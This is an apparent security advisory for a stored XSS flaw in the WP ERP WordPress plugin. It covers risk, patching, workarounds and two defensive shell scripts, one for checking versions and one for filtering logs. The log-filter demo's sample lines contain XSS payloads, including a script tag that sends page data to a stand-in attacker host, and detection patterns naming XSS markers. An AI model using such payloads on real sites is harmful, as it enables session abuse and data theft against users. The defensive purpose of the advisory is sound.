CVE-2024-12808
📋 TL;DR
The WP ERP WordPress plugin, before version 1.13.4, stores some of its settings without sanitising them and renders them without escaping. A high-privilege user (an administrator) can therefore save JavaScript in a settings field that later executes in the browser of any user who views that settings page (stored XSS). This matters on sites where administrators do not hold the unfiltered_html capability, notably multisite installs and sites that define DISALLOW_UNFILTERED_HTML, because on a default single-site install an administrator can already post arbitrary HTML.
💻 Affected Systems
- WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting WordPress plugin
📦 What is this software?
WP ERP by weDevs
⚠️ Risk & Real-World Impact
Worst Case
A malicious or compromised administrator plants a persistent script in the plugin settings. Because WordPress sets its authentication cookies HttpOnly, the script cannot simply read the session cookie; the realistic payload instead acts with the victim's authenticated session (for example creating a new administrator or installing a plugin through admin-ajax or the REST API, using a nonce read from the page), redirects victims to phishing pages, or injects a fake login form to capture passwords.
Likely Case
A malicious admin, or an attacker holding a compromised admin account, uses the flaw as a persistence mechanism: injecting tracking or beaconing scripts, defacing parts of the admin interface, or capturing the credentials and actions of other users who open the affected settings pages.
If Mitigated
Limited to admin-only exploitation with proper user access controls and monitoring; impact contained to plugin settings pages.
🎯 Exploit Status
Exploitation requires an account allowed to edit WP ERP settings (administrator level). The attacker saves JavaScript in a settings field that the plugin stores unsanitised and renders unescaped, so it runs in the browser of anyone who later opens that settings page. This is not a remote, unauthenticated entry point; its value to an attacker is persistence and lateral movement after an admin account is already under their control, or abuse by a rogue admin on a multisite network where unfiltered_html is withheld.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.13.4
Advisory (WPScan): https://wpscan.com/vulnerability/f1f823f5-d0f1-45a5-85c2-60208d76366e/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the 'WP ERP' plugin.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 1.13.4 or later from WordPress.org and update manually.
🔧 Temporary Workarounds
Remove Admin Access from Untrusted Users
Limit admin privileges to essential, trusted personnel only, to reduce the attack surface.
Disable Plugin Temporarily
If the plugin is not critical, disable it until patched to prevent exploitation:
wp plugin deactivate erp
🧯 If You Can't Patch
- Implement strict access controls and monitoring for admin accounts. The flaw needs an administrator, so account hygiene (MFA, one account per person, prompt removal of departed staff) is the primary control.
- Use web application firewall (WAF) rules to block XSS payloads in requests that save plugin settings. Treat this as defence in depth only: an administrator can obfuscate a payload, and a WAF cannot tell a rogue admin from a legitimate one.
🔍 How to Verify
Check if Vulnerable:
In WordPress admin, open Plugins > Installed Plugins and read the WP ERP version. Any version below 1.13.4 contains the unsanitised settings code. Compare versions numerically, field by field (1.9.x is older than 1.13.x), not as strings.
Check Version:
wp plugin get erp --field=version
Verify Fix Applied:
After updating, confirm WP ERP plugin version is 1.13.4 or higher in the plugin list.
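The version check above is easy to get wrong across many sites (string comparison, forgotten multisite installs), so here is an added example script, not from the page or from weDevs, that asks wp-cli for the installed WP ERP version on each site root passed as an argument and compares it field by field against 1.13.4. It assumes wp-cli is on PATH and can read each site with --path; the version_lt helper is the author's own and ignores suffixes such as -beta.

```shell
#!/bin/sh
# Added example (not from the page or the plugin vendor): check one or more
# WordPress installs for a vulnerable WP ERP version. Assumes wp-cli is on
# PATH and that each argument is a site root wp-cli can read with --path.

FIXED_VERSION=1.13.4

# version_lt A B: succeed (exit 0) when A is older than B. Compares each
# dot-separated field numerically, so 1.9.9 < 1.13.4, which a plain string
# comparison gets wrong. Trailing suffixes such as "-beta" are ignored.
version_lt() {
    a=$1 b=$2
    while [ -n "$a" ] || [ -n "$b" ]; do
        ap=${a%%.*}; bp=${b%%.*}                 # leading field of each
        if [ "$a" = "$ap" ]; then a=''; else a=${a#*.}; fi
        if [ "$b" = "$bp" ]; then b=''; else b=${b#*.}; fi
        ap=${ap%%[!0-9]*}; bp=${bp%%[!0-9]*}     # keep leading digits only
        ap=${ap:-0}; bp=${bp:-0}                 # a missing field counts as 0
        if [ "$ap" -lt "$bp" ]; then return 0; fi
        if [ "$ap" -gt "$bp" ]; then return 1; fi
    done
    return 1                                     # equal, so not "less than"
}

# erp_vulnerable VERSION: succeed when VERSION is below the fixed release.
erp_vulnerable() {
    version_lt "$1" "$FIXED_VERSION"
}

# check_site SITE_ROOT: ask wp-cli for the installed WP ERP version and report.
# Returns 0 if patched, 1 if vulnerable, 2 if the plugin or wp-cli is unavailable.
check_site() {
    site=$1
    v=$(wp plugin get erp --field=version --path="$site" 2>/dev/null) || {
        echo "$site: WP ERP not installed or wp-cli failed"
        return 2
    }
    if erp_vulnerable "$v"; then
        echo "$site: WP ERP $v is VULNERABLE, update to $FIXED_VERSION or later"
        return 1
    fi
    echo "$site: WP ERP $v is patched"
    return 0
}

# Usage: sh check-erp.sh /var/www/site1 /var/www/site2 ...
for site in "$@"; do
    check_site "$site"
done
```

On a multisite network the plugin is installed once, so one site root is enough; the per-site loop is for hosts running several independent installs.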
📡 Detection & Monitoring
Log Indicators:
- Unusual admin activity modifying plugin settings (an audit or activity-log plugin that records option changes is the usual source)
- JavaScript payloads (<script, javascript:, on*= handlers) in requests that save WP ERP settings, i.e. POST requests to wp-admin/admin.php?page=erp-settings; check whether your plugin version saves settings through admin-ajax.php instead and filter on that handler too
Standard web-server access logs do not record POST bodies, so body inspection needs a WAF or ModSecurity audit log, or a WordPress activity logger that captures the submitted values.
Network Indicators:
- Suspicious JavaScript in HTTP requests to plugin settings endpoints
- Outbound requests from administrators' browsers to unfamiliar hosts immediately after a settings page loads (a beacon or exfiltration from a planted script)
SIEM Query:
source="wordpress.log" AND "page=erp-settings" AND ("<script" OR "javascript:" OR "onload=" OR "onerror=")
Matching on the bare word "script" or on every request to wp-admin/admin.php is too noisy: it fires on every admin page view and on every .js asset load. Anchoring on the settings page and on tag or handler syntax keeps the alert volume manageable.
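To show why the query needs both anchors, here is an added example, not from the page or from weDevs, that runs the same detection logic over a few constructed log lines. The lines follow a combined-log layout with a body= field appended, as a WAF or audit log would supply; real access logs have no body and would only surface the GET requests. The regex and the function names are the author's own.

```shell
#!/bin/sh
# Added example (not from the page or the plugin vendor): flag requests that
# touch the WP ERP settings page and carry an XSS marker. The sample log is
# constructed for this example; the body= field stands in for the decoded
# request body a WAF or ModSecurity audit log records.

SAMPLE_LOG='10.0.0.5 - admin [12/Dec/2024:10:01:02 +0000] "POST /wp-admin/admin.php?page=erp-settings HTTP/1.1" 302 body=company_name=Acme&currency=USD
10.0.0.5 - admin [12/Dec/2024:10:03:15 +0000] "POST /wp-admin/admin.php?page=erp-settings HTTP/1.1" 302 body=company_name=<script>fetch("https://evil.example/c?"+document.title)</script>
10.0.0.9 - editor [12/Dec/2024:10:04:00 +0000] "GET /wp-admin/admin.php?page=erp-hr HTTP/1.1" 200 -
10.0.0.5 - admin [12/Dec/2024:10:05:40 +0000] "POST /wp-admin/admin.php?page=erp-settings HTTP/1.1" 302 body=logo_alt=x" onerror="alert(1)
10.0.0.7 - admin [12/Dec/2024:10:06:00 +0000] "GET /wp-content/plugins/erp/assets/js/script.js HTTP/1.1" 200 -'

# Common stored-XSS markers: an opening tag of a scriptable element, a
# javascript: URL, or an inline event handler (on... =) not glued to a
# preceding word, so "monthly=" or "action=" do not match.
XSS_RE='<[[:space:]]*(script|img|svg|iframe|object)|javascript:|(^|[^[:alnum:]_])on[a-z]+[[:space:]]*='

# erp_xss_hits: read log lines on stdin, print those that hit the ERP
# settings page AND contain an XSS marker. Filtering on the page first is
# what keeps ordinary .js asset loads and other admin pages out.
erp_xss_hits() {
    grep -i 'page=erp-settings' | grep -iE "$XSS_RE"
}

# erp_xss_count: number of such lines in the sample (what a SIEM rule alerts on).
erp_xss_count() {
    printf '%s\n' "$SAMPLE_LOG" | erp_xss_hits | wc -l | tr -d ' '
}

# Stand-alone run: show the hits, then the users that produced them.
printf '%s\n' "$SAMPLE_LOG" | erp_xss_hits
printf 'users: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | erp_xss_hits | awk '{print $3}' | sort -u)"
```

Against the sample, only the two settings-page POSTs with a payload are reported; the script.js asset load and the erp-hr page view, which the bare "script" / "wp-admin/admin.php" filter would have flagged, are dropped. Pipe a real WAF log through erp_xss_hits to apply the same filter.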